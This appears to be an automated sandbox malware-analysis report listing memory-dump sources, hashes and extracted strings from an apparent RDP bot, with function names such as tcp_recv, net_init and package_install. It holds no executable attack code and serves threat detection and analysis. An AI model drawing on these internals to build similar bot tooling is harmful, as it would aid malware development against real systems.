                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 59a41bff71f5d9d606acab6724d86878339935abeb5f622b22a94194d7529e42
                                    • Instruction ID: a43d521fda517bb8d68dee51ee924fad665db34822f6b54dc4af139bb21f3799
                                    • Opcode Fuzzy Hash: 59a41bff71f5d9d606acab6724d86878339935abeb5f622b22a94194d7529e42
                                    • Instruction Fuzzy Hash: 7221DAD0E4C8C386FB264679EE4437E11509F0B309FA84532E50ECA5F1CEDDEC899A4A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: b50f7d9af04bdf8ac8a82e6efc4e5553d617ce4fcb2c9f96e8266a6a6e7f4401
                                    • Instruction ID: fcfd5308e517af86341889e42d2162ec1e620b880215c07c20fac1d9e92f771f
                                    • Opcode Fuzzy Hash: b50f7d9af04bdf8ac8a82e6efc4e5553d617ce4fcb2c9f96e8266a6a6e7f4401
                                    • Instruction Fuzzy Hash: A72185E8E0D5C382FB664E78DCCC37D11409F00369FA845B3D58FAA990DE5CA8C5A752
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 2b6a6c52b567d369e81db189b2072c9d4e9a6c0f948acaaff6909379fc6761a6
                                    • Instruction ID: 9ad0cdad15c376d325671de4a72bf85c538cd8c00eedfe8819c2de6e3609eb41
                                    • Opcode Fuzzy Hash: 2b6a6c52b567d369e81db189b2072c9d4e9a6c0f948acaaff6909379fc6761a6
                                    • Instruction Fuzzy Hash: 5A218050E2F983C3FF746658A4A4379D1525F60349FE649B2E00ECA6B4CE1CE887536A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: f7eacea280f45015c693a89ef57757bf08c9e43340c975e6a3bd5a496a3bf66f
                                    • Instruction ID: f57ece66a2208832c3cb375d8133ee3fa50af9b48f57356c26d997b747839cc8
                                    • Opcode Fuzzy Hash: f7eacea280f45015c693a89ef57757bf08c9e43340c975e6a3bd5a496a3bf66f
                                    • Instruction Fuzzy Hash: 9D1149E0F0D5A691F9236A39EC406B422106F177B4F502334D92DCB6F1EE9CAE468301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: c142d803a55d224ef68baa2862091450f67a5483f883c1677db543f6e56db5bc
                                    • Instruction ID: 5f76514991443c78fe5ef7a9091bcf62005ce5bc32fbdf89c4b1cf65edb628f8
                                    • Opcode Fuzzy Hash: c142d803a55d224ef68baa2862091450f67a5483f883c1677db543f6e56db5bc
                                    • Instruction Fuzzy Hash: EA116DD0E0C593A1FA625735EE512B412446F1B7B4F511330E92DCAAF2DEDCED068300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
                                    • Instruction ID: f4e4e08836e677c6f629492f2cb8dcc0dae2e895cf4b198d402a94350b59bf68
                                    • Opcode Fuzzy Hash: eba924376e7af55d3e9d9af242b3953526818afa655de96f566b8cdee47eb7cc
                                    • Instruction Fuzzy Hash: A1118FE0A2D68741E5129734EC516BD1242AF277B4F4D07B2E82DBA6FADE1CE9568300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: a022570f76a87d175e6b89a9e29889a2c9fff595502eb920f882fbc327c3d23e
                                    • Instruction ID: 715a4f69216d4e401d0e8367a32d9be70a09da5d3008f3c7ac6117a88a6e5651
                                    • Opcode Fuzzy Hash: a022570f76a87d175e6b89a9e29889a2c9fff595502eb920f882fbc327c3d23e
                                    • Instruction Fuzzy Hash: 80115EDCA0C5D752F6265F35EC8A37C12506F81BA4E5813B1D8EDBA5E6DE5CE5078300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                    • API String ID: 2514157807-65069805
                                    • Opcode ID: 0f3ff3b2ca26c0a814a37c163e02db9f32d8edde5c444f807830ff1ab6393cc4
                                    • Instruction ID: e749051469cc3d8d5326f5181a218f3c60ff8264519db11df2611295e1ffb68c
                                    • Opcode Fuzzy Hash: 0f3ff3b2ca26c0a814a37c163e02db9f32d8edde5c444f807830ff1ab6393cc4
                                    • Instruction Fuzzy Hash: 8A116AD4F1C9CB81FA665334EC902BC1240AF47BA4F4803B0D82DAAAE6DF1CA9578300
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,?,service,0000027B435613D0,00007FF7AABD2910), ref: 00007FF7AABD2312
                                    • GetLastError.KERNEL32(?,?,service,0000027B435613D0,00007FF7AABD2910), ref: 00007FF7AABD233E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                    • API String ID: 4085810780-4145076245
                                    • Opcode ID: afa2715ad1d40dcdb6138738783ab23cee6b69dc419e77c1a9849a41664b9388
                                    • Instruction ID: 055b9e1915e2bed52af2c870a327ea9b26ff98ff0151575f93414feba0676b4a
                                    • Opcode Fuzzy Hash: afa2715ad1d40dcdb6138738783ab23cee6b69dc419e77c1a9849a41664b9388
                                    • Instruction Fuzzy Hash: F1F05E70A4F697C9FDA1B75AE8405B4A2506F65B98FCB00B1CC0C17771ED2CA6878330
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: d4488d18e0a42c918a267e293ea772df4275023f8361731b7d862ee179a190a8
                                    • Instruction ID: dc4b466de12d3149ade6b2d25b8fa14e7a0a672fe92dc752862782bee23e3c9d
                                    • Opcode Fuzzy Hash: d4488d18e0a42c918a267e293ea772df4275023f8361731b7d862ee179a190a8
                                    • Instruction Fuzzy Hash: 5AF0C4E4F0C58391FA139F30EC45BE42220AF56384F44603AD95D8A2B1AE9CEE49C741
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: 977bd74782d614b196615815b96a5c257b6fe7e37f6e636fd22ddd5c7e52f119
                                    • Instruction ID: ed689349e978a20d494927d31243b7811b3a31116b0d710ab53a17449e5266f0
                                    • Opcode Fuzzy Hash: 977bd74782d614b196615815b96a5c257b6fe7e37f6e636fd22ddd5c7e52f119
                                    • Instruction Fuzzy Hash: 94F049E1F4E683D1FB129B31EC453F42214AF56384F440436D40DCA1B5AEACED898700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
                                    • Instruction ID: d421f0b4116378b7470e7e96fa79a9612bf1ba432f600b6dbcf8417fe2ba8b2f
                                    • Opcode Fuzzy Hash: 625dc732f90a1f00aa4c1569bcfd38f081e90a6b280c64cbe464392608da0e77
                                    • Instruction Fuzzy Hash: 1AF0FFE0B1858691FB139734EC563FC12116F62385F8C0AB2D45D6A5BAED5DEA49C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: b03f20fe3f20e1b22ed287096309a162714d679d7d2059db2c8f5ad47a950a63
                                    • Instruction ID: a11be200517f4d59e9efb84c21aa0f398fb7adacd356930c5bd272774734205a
                                    • Opcode Fuzzy Hash: b03f20fe3f20e1b22ed287096309a162714d679d7d2059db2c8f5ad47a950a63
                                    • Instruction Fuzzy Hash: E1F049E9B185C391FB129F31EC993FD1260AF91784F4C00B2C8CD6A5A2EE1CE5498300
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: bc4c520f6590c09bcddd1a732d5270efd1af774c120911b4238902bc3e0d488b
                                    • Instruction ID: 2ca1a06afc235fedc5022af3e8512be3a8074496f01cfde0aeb0a05eff98b9df
                                    • Opcode Fuzzy Hash: bc4c520f6590c09bcddd1a732d5270efd1af774c120911b4238902bc3e0d488b
                                    • Instruction Fuzzy Hash: CFF044E0A0D49A92FB169B34EC217F52250AF16384F40007AD90DDA2BAAEDDEE5C8710
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: Startupfflushfwrite
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                    • API String ID: 3771387389-898331216
                                    • Opcode ID: c98d2fb679d102adca68af7222b5995fb6494255a96ca0710833faf5cff4ed83
                                    • Instruction ID: 218e612722e66c77ce8cf94d229a90c381757f87ecb528a3069e590bb1008ca8
                                    • Opcode Fuzzy Hash: c98d2fb679d102adca68af7222b5995fb6494255a96ca0710833faf5cff4ed83
                                    • Instruction Fuzzy Hash: DDF01DE0B089CB91FB529B30EC457FC2350AF56784F4C01B6D40E6A6D5EE1CE54A8700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$HandleModule_mbscpy
                                    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                    • API String ID: 3656010895-1379287937
                                    • Opcode ID: db6eed1cd3525cb218b597a370394d1be1573cc38729b3d646ccfd8e6f807412
                                    • Instruction ID: bdaa70ac75fa170549c7bd25ca176b97bac8c6721fddf8a66dcec3c1614b7a09
                                    • Opcode Fuzzy Hash: db6eed1cd3525cb218b597a370394d1be1573cc38729b3d646ccfd8e6f807412
                                    • Instruction Fuzzy Hash: EE31C332A0FA87D6FB60AB54E4903E9A361FB84348FC10472E64E472B5DF6DD50AC750
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                    • API String ID: 1224403792-3063791425
                                    • Opcode ID: c51739f849e10a46f963a5a3124a536443c51d0326aeb556ed4cbbc75bd3727e
                                    • Instruction ID: eefa134a67656485f600195b7978d1dbe459b36d17a0baead1bf07f969ce5c27
                                    • Opcode Fuzzy Hash: c51739f849e10a46f963a5a3124a536443c51d0326aeb556ed4cbbc75bd3727e
                                    • Instruction Fuzzy Hash: 26F08BE0F0D78791FE139B25EC411A56221AF06BC4F445032CD5C8BBB4EEACAE468301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastProcfflushfwrite
